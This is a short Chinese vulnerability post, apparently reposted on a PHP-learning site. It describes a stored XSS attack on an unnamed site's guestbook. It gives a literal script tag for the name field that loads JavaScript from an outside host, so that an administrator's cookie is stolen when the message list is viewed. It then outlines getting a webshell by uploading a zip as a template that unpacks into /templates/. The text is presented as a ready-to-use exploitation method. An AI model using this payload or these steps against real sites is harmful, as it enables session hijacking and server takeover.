来源:自学PHP网 时间:2015-04-17 14:47 作者: 阅读:次
[导读] 发布作者:noevil 漏洞类型:XSS跨站利用方法:在线留言处: 名字填写: NoevilSCRIPT SRC=HTTP://www.2cto.com /xss.js/SCRIPT内容:随意。后台管理员查看留言列表,自动截取Cookie,NoXss会努力的去...
发布作者:noevil 漏洞类型:XSS跨站 利用方法: 在线留言处: 名字填写: Noevil<SCRIPT SRC="HTTP://www.2cto.com /xss.js"></SCRIPT> 内容:随意。 后台管理员查看留言列表,自动截取Cookie,NoXss会努力的去Keep Session登陆后台 拿Shell: 添加模板,上传Zip,Zip里的东西会自动解压到 /templates/目录里。 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com